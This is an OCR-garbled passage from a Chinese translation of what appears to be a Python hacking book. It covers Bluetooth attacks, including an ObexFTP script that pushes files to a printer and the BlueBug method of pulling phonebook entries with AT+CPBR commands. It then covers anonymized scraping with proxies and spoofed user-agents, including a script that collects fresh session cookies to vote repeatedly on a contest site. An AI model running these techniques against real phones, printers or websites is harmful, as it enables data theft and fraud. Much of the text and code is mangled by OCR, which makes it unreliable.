但 我 们 还 不 能 判断 这 些 端 口 提 供 的 都 是 什么 服务 。 要 获得 关于 这 些 服务 的 更 多 信息 ， 我 们 需 
要 使 用 蓝牙 服务 发 现 协议 (Bluetooth Service Discovery Protocol) 。 

attacker# python rfcommScan.py 

[+] RFCOMM Port 1 open 


[+] RFCOMM Port 2 open 
[+] RFCOMM Port 3 open 
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使 用 蓝牙 服务 发 现 协 议 


蓝牙 服务 发 现 协议 (Service Discovery Protocol, SDP) 提供 了 一 种 简便 方法 ， 用 于 描述 
和 枚 举 蓝牙 配置 文件 的 类 型 以 及 设备 提供 的 服务 。 设 备 的 SDP 配置 文件 中 描述 了 运行 在 各 个 
蓝牙 协议 和 端口 上 的 服务 。 调 用 函数 find service0 之 后 返回 record 数组 ， 目 标 蓝牙 设备 上 的 
每 个 服务 都 对 应 数组 中 的 一 个 record， 每 个 record 中 记录 了 主机 、 名 称 、 描 述 、 提 供 者 
(provider) 、 协 议 、 端 口 、 服 务 类 、 配 置 文件 和 服务 ID。 根 据 自 己 的 需求 ， 我 们 的 脚本 只 要 
打印 出 服务 名 称 、 协 议和 端口 号 即 可 。 






BIRTE E EN See 
Mi PUP | Ld Be a aH 
SO “Binge Se 


对 蓝牙 打印 机 运行 这 个 脚本 时 可 以 看 到 ，RFCOMM 端口 2 提供 了 OBEX 对 象 的 Push 配 
置 文件 。 对 象 交 换 (Object Exchange, OBEX) 服务 允许 我 们 能 像 使 用 匿名 FTP 那样 匿名 地 向 
一 个 系统 中 上 传 (push) AFR (pull) 文件 。 这 或 许 表 明 我 们 值得 在 打印 机 上 做 更 深入 的 研 
Te 
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用 Python ObexFTP 控 制 打印 机 


让 我 们 继续 对 打印 机 实施 攻击 。 因 为 它 在 RFCOMM 端口 2 上 提供 了 OBEX X% Push 服 
务 ， 让 我 们 试 着 向 它 上 传 一 个 图 像 文件 。 我 们 用 ObexFTP 连接 到 打印 机 。 接 下 来 ， 我 们 会 从 
攻击 用 的 工作 站 上 向 它 发 送出 一 个 名 为 / tmp/ ninja.jpg 的 图 像 文件 。 文 件 上 传 成 功 后 ， 我 们 的 
打印 机 会 打印 出 一 幅 漂亮 的 忍者 图 片 。 这 挺 令 人 振奋 的 ， 但 没什么 危险 ， 在 下 一 节 中 ， 我 们 
将 会 继续 使 用 这 种 方法 针对 提供 蓝牙 服务 的 手机 发 起 更 致命 的 攻击 。 


import obexftp 

try: 
btPrinter = obexftp.client (obexftp.BLUETOOTH) 
btPrinter.connect ('00:16:38:DE:AD:11', 2) 
btPrinter.put file('/tmp/ninja.jpg') 
print '[+] Printed Ninja Image. ' 

except: 
print '[-] Failed to print Ninja Image.' 


Paris Hilton 不 是 被 蓝牙 攻击 的 

2005 +, Paris Hilton 还 是 一 个 现实 生活 中 鲜 为 人 知 的 名 人 。 然 而， 当 一 个 带 病毒 
的 视频 在 互联 网 上 出 现时 ， 这 一 切 都 改变 了 。 法 庭 后 来 裁定 来 自 马赛 诸 塞 州 的 17 岁 少 
年 非法 入 侵 了 Paris Hilton 使 用 的 T-Mobile Sidekick 手机 。 入 侵 后 ，17 岁 的 少年 黑客 


窃取 了 Paris 手机 中 的 地 址 簿 、 记 事 本 和 照片 ， 并 将 其 发 布 到 互联 网 上 一 一 接 下 来 的 事 
情 都 被 载 入 了 历史 。 这 个 未 成 年 人 为 他 的 罪行 在 青少年 拘留 所 服刑 11 个 月 (Krebs, 
2005 )。 这 一 黑客 袭击 距 第 一 款 被 称 为 Cabir.Quick 的 蓝牙 蠕虫 病毒 公开 散播 仅 两 天 ， 
因而 多 家 新 闻 机 构 在 报道 中 错误 地 将 Paris 手机 被 入 侵 的 原因 归 为 蓝牙 漏洞 。 但 实际 
上 ， 攻 击 者 利用 的 是 一 个 允许 他 重 设 Paris 的 手机 密码 以 获取 访问 权 的 漏洞 。 虽 然 这 些 
报道 被 证 明 有 误 ， 但 它们 使 国民 开始 重视 这 些 以 前 很 少 被 提 及 的 蓝牙 协议 漏洞 。 





用 Python 利用 手机 中 的 BlueBug 漏 洞 


在 本 节 中 ， 我 们 将 重 现 一 种 攻击 开放 了 蓝牙 功能 手机 的 方法 。 这 种 一 开始 被 称 为 
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“BlueBug” 的 攻击 方法 会 与 手机 建立 一 个 不 需要 经 过 认证 的 不 安全 连接 ， 并 通过 这 一 连接 窃 
取 手 机 中 的 信息 或 直接 向 手机 发 送 命令 。 这 种 攻击 通过 RFCOMM 信道 发 送 AT 命令 的 方式 ， 
远程 控制 设备 。 这 使 得 攻击 者 能 读 / 发 短信 息 、 收 集 个 人 信息 ， 或 强制 拨打 1~900 这 个 电话 号 
码 。 

例如 ， 攻 击 者 可 以 通过 RFCOMM 17 信道 控制 诺基亚 6310i 手机 (固件 版 本 低 于 
5.51) 。 在 这 款 手机 版 本 以 前 的 固件 中 ， 在 RFCOMM 17 信道 上 建立 连接 不 需要 经 过 认证 。 
攻击 者 可 以 轻而易举 地 扫描 开放 的 RFCOMM 信道 ， 找 到 RFCOMM 17 信道 后 就 能 发 起 连 
接 ， 并 发 送 AT 命令 获取 电话 短 。 

让 我 们 用 Python 重 现 这 种 攻击 。 同 样 ， 我 们 还 需要 在 Python 脚本 中 导入 bluez API。 在 
确定 攻击 的 目标 地 址 和 有 漏洞 的 RFCOMM 端口 后 ， 我 们 向 这 个 端口 建立 一 个 开放 的 未 经 身 
份 验证 的 不 加 密 的 连接 。 通 过 这 个 新 建立 的 连接 ， 我 们 发 出 一 个 类 似 “AT + CPBR=1” 的 命 
令 ， 获 取 手 机 电话 竹中 的 第 一 个 联系 人 信息 。 我 们 可 以 重复 这 一 命令 ， 窍 取 整 个 手机 电话 短 
中 所 有 的 信息 。 





对 一 部 有 漏洞 的 手机 运行 攻击 脚本 ， 我 们 获取 了 手机 中 前 五 个 联系 人 的 信息 。 只 用 不 到 
15 行 的 代码 ， 就 能 通过 蓝牙 远程 窃取 到 手机 中 的 电话 短 。 太 棒 了 ! 


iad na ATO E th a Hi mi NHE ONNE lee 


Re 


psy Te 
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本 章 小 结 


恭喜 ! 在 这 一 章 中 ， 我 们 已 经 写 了 不 少 工具 ， 可 以 用 它们 来 检查 无 线 网 络 和 蓝牙 设备 的 
安全 性 。 一 开始 ， 我 们 嗅 探 无 线 网 络 获取 其 中 传输 的 个 人 信息 。 接 下 来 介绍 了 如 何 分 析 
802.11 无 线 流量 ， 从 中 发 现 首 选 网 络 并 找到 隐藏 的 Wi-Fi 热 态 。 然 后 ， 我 们 “迫降 ”了 一 染 
无 人 机 并 编写 了 一 个 能 识别 无 线 黑客 使 用 的 工具 包 的 工具 。 对 于 蓝牙 协议 ， 我 们 编写 了 一 个 
工具 ， 用 它 能 查找 蓝牙 设备 ， 扫 描 它们 ， 并 利用 打印 机 和 手机 中 的 漏洞 进行 攻击 。 

希望 你 喜欢 这 一 章 。 我 把 它们 写 出 来 时 很 有 感觉 ， 可 我 不 能 保证 我 的 妻子 也 有 同感 ， 
为 她 不 得 不 处 理 她 打印 机 上 不 断 打印 出 来 的 忍者 图 片 ， 她 的 iPhone 手机 电池 会 神 不 知 软 不 客 
地 消耗 殖 尽 ， 家 里 的 网 络 接 入 点 也 会 突然 变 成 隐 珊 状态 ， 或 者 我 五 岁 的 女儿 一 一 她 的 玩具 无 
人 机 因 被 他 的 爸爸 改进 代码 而 不 断 地 从 天 空中 掉 下 来 。 在 下 一 章 中 ， 我 们 将 介绍 使 用 Python 
对 开源 社交 媒体 网 络 进行 侦察 的 一 些 方法 。 
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本 章 简 介 : 
。 用 Mechanize 类 匿名 浏览 互联 网 
e 用 Beautiful Soup 在 Python 中 映射 网 站 元 素 
。 用 Python 与 谷歌 搜索 引擎 交互 
e 用 Python 与 Twitter 交互 
。 自动 鱼 又 式 网 络 


在 我 87 年 的 人 生 里 ， 我 见证 了 一 系列 技术 革命 ， 但 其 中 没有 一 个 能 代替 
人 的 主观 能 动 性 或 思考 能 力 。 


一 一 伯 纳 德 巴 鲁 克 米 ， 第 28 任 和 第 32 任 美 国 总 统 的 总 统 顾 问 


引言 : 当今 的 社会 工程 


在 2010 年 ， 两 次 大 规模 的 网 络 攻击 改变 了 我 们 今天 对 网 络 战 本 质 的 理解 。 在 本 书 的 第 4 
章 中 已 经 讨论 过 “极光 行动 ”， 在 该 行动 中 ， 黑 客 的 攻击 目标 包括 雅虎 、 赛 门 铁 克 、Adobe 
公司 、 诺 斯 罗 普 。 格 鲁 门 公司 和 陶 氏 化 学 等 多 个 跨国 公司 及 一 些 Gmail 账户 (Cha & 
Nakashima, 2010, p. 2) 。《 华 盛 顿 邮 报 》 跟 踪 报 道 称 ， 截 至 该 攻击 行为 被 发 现 和 被 调查 时 ， 
此 攻击 行为 已 达到 “一 个 新 的 成 熟 水平 ”。Stuxnet wE (BKA) 的 攻击 目标 是 
SCADA 系统 ， 特 别 是 伊朗 的 SCADA 系统 〈 美 联 社 ，2010 Æ) 。 网 络 防 御 方 关注 的 是 
Stuxnet 病毒 〈 在 攻击 手段 方面 ) 的 进一步 发 展 情况 ， 这 是 “ 比 极 光 更 成 熟 、 技 术 更 先进 的 
CHE) 针对 性 的 攻击 ” (Matrosov, Rodionov, Harley & Malcho, 2010) 。 尽 管 这 两 个 网 络 攻击 
都 已 非常 尖端 ， 但 它们 都 在 一 个 关键 点 上 相似 : 它们 都 〈 至 少 是 部 分 ) 依靠 社会 工程 技术 进 
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行 传播 (Constantin，2012) 。 

无 论 网 络 攻 击 变 得 多 么 复杂 或 致命 ， 使 用 有 效 的 社会 工程 技术 总 会 增加 攻击 的 效率 。 在 
本 章 中 ， 我 们 将 研究 如 何 使 用 Python 自动 完成 一 次 社会 工程 攻击 。 

在 执行 任何 操作 之 前 ， 攻 击 者 都 应 掌握 待 攻 击 目 标的 详细 信息 一 一 攻击 者 信息 掌握 得 越 
翔实 ， 攻 击 成 功 的 概率 也 就 越 大 。 这 个 概念 也 适用 于 信息 战 的 领域 。 在 该 领域 中 ， 以 及 今天 
这 个 时 代 ， 所 需 的 大 部 分 信息 都 可 以 在 互联 网 上 找到 。 由 于 互联 网 的 规模 巨大 ， 导 致 重要 信 
息 的 片段 残留 在 网 上 的 可 能 性 很 高 。 在 搜寻 这 类 信息 时 ， 计 算 机 程序 可 以 自动 完成 整个 过 
程 。Python 是 一 款 很 好 的 自动 化 任务 的 工具 ， 因 为 它 拥 有 大 量 第 三 方 数 据 库 ， 可 以 很 方便 地 
编写 与 网 站 和 互联 网 进行 交互 操作 的 脚本 。 


攻击 前 的 侦察 行动 


在 本 章 中 ， 我 们 还 会 继续 练习 对 指定 目标 的 侦查 。 这 一 过 程 中 关键 的 一 点 是 : 确保 我 们 
尽 可 能 多 地 收集 信息 ， 同 时 不 被 公司 总 部 警惕 性 高 且 能 干 的 网 络 管理 员 发 现 。 最 后 ， 我 们 来 
看 一 下 ， 要 如 何 汇总 数据 ， 并 人 允许 对 特定 实体 进行 一 个 高 度 复杂 和 个 性 化 的 社会 工程 攻击 。 
请 确保 你 在 使 用 相关 技术 的 其 他 设备 进行 攻击 之 前 ， 已 经 咨询 过 执法 部 门 的 官员 或 专业 人 
士 。 我 们 在 这 里 展示 这 些 攻击 方式 及 相关 工具 ， 是 为 了 更 好 地 理解 它们 ， 并 知晓 如 何在 现实 
生活 中 防御 它们 。 


使 用 Mechanize 库 上 网 


计算 机 用 户 一 般 都 是 用 Web 浏览 器 查看 网 页 和 上 网 冲浪 的 。 每 个 网 站 都 是 不 同 的 ， 它 们 
会 以 各 种 不 同 的 组 合 方式 排列 照片 、 音 乐 和 视频 。 但 是 ， 浏 览 器 实际 上 只 是 读 取 一 个 文本 类 
型 的 文档 ， 解 释 执行 其 中 的 代码 ， 并 把 结果 显示 给 用 户 ， 浏 览 器 和 网 页 之 间 的 关系 就 类 似 于 
Python 程序 源 文件 和 Python 解释 器 之 间 的 关系 。 用 户 可 以 通过 浏览 器 查看 网 页 ， 也 可 以 用 各 
种 不 同 的 方法 查看 网 页 源码 。Linux 程序 wget 就 是 一 个 被 广泛 使 用 的 方法 。 在 Python 中 ， 浏 
览 网 页 的 唯一 方法 是 提取 和 解析 网 站 的 HTML 源码 。 目 前 已 经 有 很 多 不 同 的 专 为 处 理 网 页 内 
容 的 任务 的 库 被 编写 出 来 。 我 们 特别 喜欢 Mechanize 一 一 你 也 看 到 它 在 前 几 章 已 被 使 用 过 。 
Mechanize 是 一 个 第 三 方 库 ， 下 载 地 址 是 : http://wwwsearch.sourceforge.net/mechanize/ 
(Mechanize, 2010) 。Mechanize 中 的 主要 类 (Browser) 允许 我 们 对 浏览 器 中 的 任何 内 容 进 
行 操作 。 这 个 类 中 还 有 其 他 一 些 能 让 程序 员 们 活 得 更 滋润 的 辅助 方法 。 下 面 这 个 脚本 演示 了 
Mechanize 最 基本 的 使 用 方法 : 提取 网 站 的 源码 。 这 需要 创建 一 个 browser 对 象 ， 然 后 调用 它 
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的 open() 方 法 。 
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运行 该 脚本 ， 我 们 可 以 看 到 它 已 打印 出 www.syngress.com 网 站 中 index 页 面 的 HTML 代 
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本 章 将 使 用 mechanize.Browser 类 编写 脚本 来 浏览 互联 网 。 不 过 ， 你 也 不 是 只 能 使 用 它 ， 
Python 提供 了 多 种 不 同 的 上 网 方法 。 本 章 使 用 Mechanize， 是 因为 它 提供 了 一 个 特殊 的 功能 。 
John J. Lee 设计 的 Mechanize， 提 供 了 状态 化 编程 (stateful programming) 和 方便 的 HTML 表 
单 填写 ， 便 于 解析 和 处 理 诸如 “HTTP-Equiv” 和 刷新 之 类 的 命令 。 此 外 ， 它 还 自 带 了 不 少 能 
让 你 保持 匿名 状态 的 函数 。 在 下 面 的 内 容 中 ， 你 将 看 到 这 是 非常 有 用 的 。 


匿名 性 一 一 使 用 代理 服务 器 、User-Agent 及 cookie 


现在 我 们 已 经 能 从 互联 网 上 获取 网 页 了 ， 我 们 该 后 退 一 步 考虑 整个 上 网 过 程 了 。 我 们 的 
程序 在 打开 网 页 时 和 网 页 浏览 器 是 没有 什么 区 别 的 ， 所 以 我 们 可 以 使 用 与 正常 上 网 时 使 用 的 
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相同 步骤 进行 匿名 上 网 。 网 站 有 多 种 方法 能 够 唯一 标识 网 页 的 访问 者 。Web 服务 器 记录 发 起 
网 页 请 求 的 IP 是 标识 用 户 的 第 一 种 方式 。 只 要 使 用 VPN (virtual private network， 虚 拟 专 用 网 
络 ， 一 种 能 代 客 户 端 发 起 请 求 的 代理 服务 器 ) 或 者 Tor 网 络 就 能 搞定 它 。 当 客户 端 连 上 VPN 
后 ， 所 有 的 网 络 流量 都 会 自动 经 VPN 路 由 发 送 。Python 也 可 以 连接 代理 服务 器 ， 这 能 给 程序 
增加 匿名 性 。Mechanize 的 Browser 类 中 有 一 个 属性 ， 即 程序 能 用 它 指定 一 个 代理 服务 器 。 只 
设置 浏览 器 的 代理 服务 器 还 不 够 。 网 上 有 许多 免费 的 代理 服务 器 ， 用 户 可 以 获取 它们 ， 把 其 
中 的 一 些 传递 给 相关 函数 。 在 这 个 例子 中 ， 我 们 选择 从 http://www.hidemyass.com/ 中 获取 一 
个 HTTP 代理 。 不 过 有 可 能 当 你 获取 到 这 个 代理 时 ， 它 已 经 失效 了 ， 我 们 前 往 
www.hidemyass.com 获取 另 一 个 有 效 的 HTTP 代理 服务 器 的 详细 配置 信息 来 使 用 。 此 外 ， 
McCurdy 在 http://rmccurdy.com/scripts/proxy/good.txt 中 维护 着 一 个 可 用 代理 的 列表 。 我 们 可 
以 访问 美国 国家 海洋 和 大 气管 理 局 (NOAA) 的 网 站 ， 测 试 代理 设置 是 否 起 效 ， 该 网 站 非常 
贴心 地 提供 了 一 个 网 页 ， 访 问 该 页 面 时 ， 它 会 告诉 你 当前 的 I 了 P 地 址 。 


import mechanize 
def testProxy (url, proxy): 
| _ browser = mechanize.Browser () 
browser. set_proxies (proxy) 
page = browser.open(url) 
i Seurce code = pagen read (yi...) 
print source code | 
url = 'http://ip.nefsc.noaa.gov/' 
hideMeProxy = Cheto": °*°246155. 139 TI TE 
~ testProxy (url, hideMeProxy) — 


尽管 直接 阅读 HTML 源码 的 难度 有 点 大 ， 但 我 们 还 是 可 以 看 到 该 网 站 已 经 认为 我 们 的 IP 
地 址 是 216.155.139.115 一 一 这 是 代理 服务 器 的 IP 地址。 成功! 让 我 们 继续 编写 新 的 代码 。 


recon:~# python proxyTest.py 
<html ><head><title>what's My IP Address?</title></head> 
<,..SNIPPED...> 
<b>Your IP address is...</b></font><br><font Seg oat face=arial 
color=red> 216.155.139.115</font><br><br><br><center> <font size=+2 
~ face=arial color=white> <b>Your hostname appears to be...</b></ 
font><br><font size=+2 face=arial color=red> 216.155.139.115. 
_ choopa.net</font></font><font color=white | 
<. .SNIPPED. a 


我 们 的 浏览 器 现在 有 一 层 匿名 性 了 ， 但 网 站 还 会 使 用 浏览 器 提供 的 user-agent 字符 串 作为 
唯一 标识 用 户 的 另 一 种 方法 。 在 正常 情况 下 ，user-agent 字符 串 可 以 让 网 站 获知 用 户 使 用 的 是 
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哪 种 浏览 器 这 一 重要 信息 ， 网 站 能 据 此 调整 HTML 代码 ， 为 用 户 提供 更 好 的 上 网 体验 。 但 
user-agent 里 还 记录 了 内 核 版 本 、 浏 览 器 版 本 ， 以 及 其 他 一 些 关 于 用 户 的 详细 信息 。 亚 意 网 站 
利用 这 些 信 息 根 据 不 同 的 浏览 器 版 本 发 送 不 同 的 〈 浏 览 器 中 ) 漏洞 利用 代码 ， 而 其 他 一 些 网 
站 则 利用 这 些 信息 区 分 那些 躲 在 NAT 后 面 的 局 域 网 里 的 用 户 。 在 最 近 爆 出 的 丑闻 里 ， 某 些 旅 
游 网 站 还 会 用 user-agent 字符 串 找 出 使 用 Macbook 〈 苹 果 计算 机 ) 的 用 户 ， 并 向 他 们 兜售 更 晶 
贵 的 旅游 产品 。 


还 好 ，Mechanize 能 像 添加 代理 那样 ， 轻 松 地 修改 user-agent, ， 网 站 http://www. 
useragentstring.com/pages/useragentstring.php 向 我 们 提供 了 大 量 有 效 的 user-agent 字符 串 ， 可 以 
在 下 面 这 个 函数 中 使 用 。 我 们 来 写 一 个 脚本 ， 试 试 能 不 能 把 user-agent 改 成 运行 在 Linux 2.4 
内 核 上 的 Netscape Browser 6.01。 写 完 之 后 访问 http://whatismyuseragent.dotdoh.com/， 该 网 站 
会 把 user-agent 字符 串 打印 出 来 。 





运行 这 个 脚本 ， 我 们 很 成 功 地 发 现 ， 弹 出 来 的 网 页 里 给 出 的 是 虚假 的 user-agent 字符 串 。 
该 网 站 认为 我 们 正在 用 Netscape 6.01， 而 不 是 用 Python 获取 网 页 。 


站 天 . # ‘ 
~ ry 
pea ot diy’ Tah 
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最 后 ， 网 站 还 会 给 Web 浏览 器 发 送 cookie，cookie 中 记录 了 一 些 能 唯一 标识 用 户 的 信 
息 ， 网 站 用 它 来 验证 用 户 之 前 是 否 访 问 /登录 过 该 网 站 。 为 了 防止 这 种 情况 发 生 ， 在 我 们 执行 
匿名 操作 之 前 一 定 要 清除 浏览 器 中 的 cookie. Python 发 布 版 的 核心 库 里 有 一 个 名 为 Cookielib 
的 库 ， 其 中 含有 几 个 不 同 的 能 用 来 处 理 cookie 的 容器 。 这 里 使 用 的 是 一 个 能 把 各 个 不 同 的 
cookie 保存 到 磁盘 中 的 容器 。 该 功能 允许 用 户 在 收 到 cookie 之 后 ， 不 必 把 它 返回 给 网 站 ， 并 
能 得 看 其 中 的 内 容 。 我 们 来 编写 一 个 脚本 ， 打 开 之 前 第 一 个 例子 中 已 打开 过 的 
http://www.syngress.com 网 站 ， 只 不 过 这 次 打印 出 来 的 是 浏览 器 在 会 话 中 存储 下 来 的 cookie. 


import mechanize 
import cookielib 
def printCookies(url): 
browser = mechanize.Browser () 
cookie jar = cookielib.LWPCookieJar () 
browser.set_cookiejar (cookie jar) 
page = browser.open (url) 
for cookie in cookie jar: 
print cookie 
url = 'http://www.syngress.com/' 
printCookies (url) 


运行 该 脚本 ， 我 们 看 到 浏览 Syngress 网 站 唯一 标识 该 会 话 ID 的 Cookie. 


recon:~# python printCookies. py | | 

<Cookie ， _syngress _session=BAh7CTONY3VydmVudHkiCHVzZDoJbGFzdCTAOg9zZYNZ 

= aW9uX21kIiUlZW 
FmNmIxMTO5ZTOxMzUxZmME2ZDI1MSBlYTA4ZDUXOSIKZMxhc2hJQZonQWNOaW8u 
Q2 9udHJvbGx1cjo6Rmxhc2g60kZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D-- , 
£80£741456£6c0dc82382bd8441b75a7a39f76c8 forwww. syngress.com/> 


把 代码 集成 在 Python 类 的 AnonBrowser 中 


现在 已 经 有 了 几 个 函数 ， 它 们 的 输入 参数 是 一 个 Browser 对 象 ， 并 会 对 它 进行 修改 ， 函 
数 偶尔 也 会 使 用 一 个 额外 的 参数 。 如 果 能 把 它 添加 到 Mechanize 的 Browser 类 中 ， 把 所 有 这 些 
国 数 归结 为 调用 一 个 普通 的 Browser HR, if AN Ae VA YEE HE TR AN WIS Vd FP LE UR OC 
中 我 们 上 自己 写 的 函数 ， 这 是 非常 有 意义 的 。 我 们 可 以 通过 继承 Mechanize 的 Browser 类 的 方式 
来 实现 这 一 点 。 我 们 的 新 Browser 类 将 拥有 前 面 已 经 写 好 的 各 个 函数 ， 同 时 还 会 添加 一 个 
int _ 消 数 ， 这 有 助 于 提高 代码 的 可 读 性 ， 并 封装 所 有 的 函数 ， 使 我 们 只 要 在 同一 个 地 方 直 
接 处 理 Browser 类 就 可 以 。 
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在 这 个 新 的 类 中 有 一 个 默认 的 user-agents 列表 ， 以 及 一 个 可 供用 户 使 用 的 代理 服务 器 的 
列表 。 此 外 ， 在 构造 函数 中 ， 用 户 也 可 以 提供 自己 的 user-agent 列表 和 代理 服务 器 列表 ， 构 造 
函数 会 把 它们 添加 到 类 中 默认 的 列表 中 。 它 也 有 之 前 我 们 编写 的 三 个 函数 ， 既 可 以 单独 使 用 
各 个 匿名 化 方法 ， 也 可 以 一 次 性 同时 使 用 它们 。 最 后 ，anonymize 函数 还 有 一 个 能 让 进程 休眠 
60 秒 的 参数 ， 这 会 增加 使 用 了 匿名 化 方法 前 后 两 次 请 求 在 服务 器 日 志 中 出 现 的 时 间 间 隔 。 尽 
管 这 不 会 改变 发 送 的 信息 ， 但 这 个 额外 的 步骤 将 会 降低 服务 器 识别 出 前 后 两 个 活动 是 从 同一 
个 地 方 发 出 的 概率 。 这 种 增加 操作 间隔 的 行为 类 似 于 “ 因 沉 默 而 安全 ”的 理念 ， 但 额外 的 预 
防 措 施 是 有 帮助 的 ， 因 为 时 间 通 常 不 是 一 个 问题 。 其 他 的 程序 可 以 像 使 用 Mechanize 的 
Browser 类 那样 使 用 这 个 新 的 类 。 由 于 要 导入 其 中 的 函数 ， 含 有 新 类 的 这 个 文件 
anonBrowser.py 必须 和 调用 它 的 脚本 保存 在 同一 个 目录 中 。 | 

让 我 们 写 一 个 脚本 导入 这 个 新 的 Browser 类 。 我 有 一 个 几 年 前 结识 的 教授 朋友 ， 他 曾 帮 
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助 他 4 岁 的 女儿 参与 评选 最 可 爱 猫 咪 网 上 投票 的 一 个 竞争 活动 。 投 票 的 计数 是 基于 会 话 的 ， 
每 个 投票 者 都 不 能 重复 投票 。 让 我 们 看 看 是 否 能 够 欺骗 网 站 http://kittenwar.com 让 我 们 每 次 投 
票 都 能 得 到 一 个 唯一 的 cookie。 我 们 将 用 anonymize 在 这 个 网 站 上 投 四 次 票 ， 每 次 都 拿 到 不 同 
的 cookie。 


from anonBrowser import *- 
ab = anonBrowser (proxies=[], \ 
-user_agents=[ ('User-agent", "superSecretBroswer') |) 

for attempt in range (1, 5): 

ab.anonymize () 

‘print! TTE Fetching) page"). 

response = ab.open('http://kittenwar.com') 

for cookie in ab.cookie jar: 

-. print cookie . 


运行 该 脚本 ， 我 们 看 到 通过 使 用 不 同 的 cookie 的 PHP 会 话 ， 我 们 被 网 站 认为 是 不 同 的 
人 ， 投 了 4 次 票 。 成 功 ! 让 我 们 开始 用 自己 编写 的 anonymous browser 类 抓 取 网 页 获取 目标 信 


cil 
O 


recon:~# python kittenTest.py 

[*] Fetching page ; 

<Cookie a ee aise ete! for kittenwar. com/> 
[*] Fetching page 

<Cookie PHPSESSID=25s8apnvejkakdjtd67ctonf10 for kittenwar.com/> 

[*] Fetching page © 

<Cookie PHPSESSID=16sr£8kscgb212e2fknogf4nh2 for kittenwar. Abii 
[*] Fetching page 

<Cookie PHPSESSID=73uhg6glqge9p2vpk0gt3d4ju3 for kittenwar.com/> 


用 anonBrowser 抓 取 更 多 的 Web 页 面 


我 们 现在 可 以 用 Python 来 提取 网 页 的 内 容 了 ， 对 目标 的 侦察 也 可 以 开始 了 。 我 们 将 从 抓 
取 网 页 一 一 这 是 当今 这 个 时 代 大 多 数组 织 机 构 都 会 提供 的 东西 一 一 开始 着 手 我 们 的 研究 。 攻 击 
者 可 以 仔细 查看 目标 网 站 中 提供 的 内 容 ， 在 其 中 寻找 隐藏 的 和 有 价值 的 数据 片段 。 不 过 ， 这 
一 行为 可 能 产生 大 量 (ER) 浏览 网 页 的 记录 。 如 果 将 网 站 的 内 容 下 载 到 本 地 计算 机 中 ， 就 
会 大 大 减少 重复 浏览 网 页 的 次 数 。 因 为 我 们 只 需 访问 页 面 一 次 ， 然 后 就 能 从 本 地 的 计算 机 上 
无 限 多 次 地 访问 它 。 有 许多 被 广泛 使 用 的 框架 可 以 做 到 这 一 点 ， 但 我 们 会 利用 之 前 创建 的 
anonBrowser 类 的 优势 (匿名 性 ) 编写 脚本 。 让 我 们 用 anonBrowser 类 提取 某 个 特定 目标 上 所 
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有 链接 的 网 页 。 


用 Beautiful Soup 解 析 Href 链 接 


若 要 把 目标 网 页 上 的 链接 全 都 分 析出 来 ， 我 们 有 两 种 选择 : 一 种 是 使 用 正则 表达 式 对 
HTML 代码 做 搜索 和 替换 操作 ， 另 一 种 是 使 用 一 款 名 为 BeautifulSoup 的 强大 的 第 三 方 库 〈 该 
库 的 下 载 地 址 为 http://www.crummy.com/software/BeautifulSoup/) . BeautifulSoup 的 创造 者 编 
写 了 这 个 处 理 和 解析 HTML 和 XML 极 好 的 库 〈BeautifulSoup，2012) 。 首 先 ， 我 们 将 快速 
看 一 下 怎样 分 别 用 这 两 种 方法 寻找 链接 ， 然 后 解释 为 什么 在 大 多 数 情况 下 BeautifulSoup EHE 
一 筹 。 
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wh | fy 
i in 


pan 


运行 这 个 脚本 ， 解 析 一 个 播放 《跳舞 的 仓鼠 》 (dancing hamster) 视频 的 热门 网 站 中 的 链 
接 。 我 们 的 脚本 先 用 正则 表达 式 找 出 其 中 所 有 的 链接 ， 再 用 BeautifulSoup 解析 器 (parser) 解 
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乍 一 看 ， 这 两 个 结果 好 像 差不多 。 但 实际 上 ， 使 用 正则 表达 式 和 Beautiful Soup 产生 的 结 
果 是 不 一 样 的 。 在 网 页 中 使 用 一 些 与 一 些 不 可 能 修改 的 特定 数据 片段 相关 联 的 标签 ， 可 以 增 
加 网 页 的 稳定 性 ， 特 别 是 对 那些 喜欢 经 常 玩 点 新 花样 的 网 站 管理 员 尤 为 如 此 。 举 例 说 明 : 用 
正则 表达 式 得 到 的 结果 中 ， 含 有 一 张 层 登 样 式 表 一 一 styles.css 链接 : 显然 ， 这 不 是 一 个 链 
接 ， 但 符合 我 们 的 正则 表达 式 规则 。 而 Beautiful Soup 解析 器 却 知道 该 忽略 掉 它 ， 不 把 它 显示 
在 结果 中 。 


用 Beautiful Soup 了 映射 图 像 


除 解析 网 页 上 的 链接 之 外 ， 它 对 获取 《网 页 中 的 ) 所 有 的 图 像 也 很 有 帮助 。 在 第 3 章 
中 ， 我 们 看 到 了 如 何 从 图 像 中 提取 元 数据 。 同 样 ， 这 里 的 BeautifulSoup 也 是 关键 ， 它 允许 我 
们 能 在 任何 HTML 对 象 中 找 出 所 有 的 “IMG” 标 签 。 然 后 browser 对 象 就 能 下 载 图 片 ， 并 将 
其 以 二 进 制 文件 的 形式 保存 到 本 地 硬盘 中 。 实 际 处 理 HTML 的 代码 只 要 稍 作 改 动 就 可 以 一 一 
只 要 把 表示 链接 的 “name='a'” 改 成 表示 图 片 的 “img” 即 可 。 做 完 这 一 修改 之 后 ， 基 本 的 网 
页 抓 取 代码 就 已 经 很 强壮 了 ， 从 而 可 以 用 它 从 网 站 上 下 载 图 片 ， 并 直接 写 入 硬盘 。 
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运行 这 个 脚本 ， 给 它 传 入 参数 xkcd.com， 我 们 发 现 它 成 功 地 从 我 们 喜欢 的 这 个 喜剧 网 站 
上 下 载 了 所 有 的 图 片 。 
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研究 、 调 查 、 发 现 


在 绝 大 多 数 现代 社会 工程 的 尝试 中 ， 攻 击 者 的 切入 点 总 是 目标 公司 或 企业 。 对 Stuxnet 病 
毒 的 制造 者 来 说 ， 是 那些 在 伊朗 获准 访问 某 些 SCADA 系统 的 人 。 在 “极光 行动 ”中 ， 是 在 
某 些 公司 里 能 帮助 攻击 者 获得 “重要 知识 产权 信息 ”的 人 Zetter，2010, p. 3) 。 假 设 我 们 有 
一 个 感 兴趣 的 公司 ， 并 知道 它 缘 后 的 某 个 主要 人 员 ， 一 个 普通 的 攻击 者 能 拿 到 的 信息 可 能 比 
这 还 少 。 攻 击 者 往往 只 有 掌握 他 们 的 攻击 目标 的 大 致 信息 ， 因 此 他 们 必须 利用 互联 网 和 其 他 
资源 刻画 对 象 的 其 他 信息 。 因 为 有 甲骨 文 、 谷 歌 一 一 它们 能 搜索 到 你 要 的 所 有 信息 ， 我 们 将 
编写 下 面 这 一 系列 脚本 。 


用 Python 与 谷歌 API 交 互 


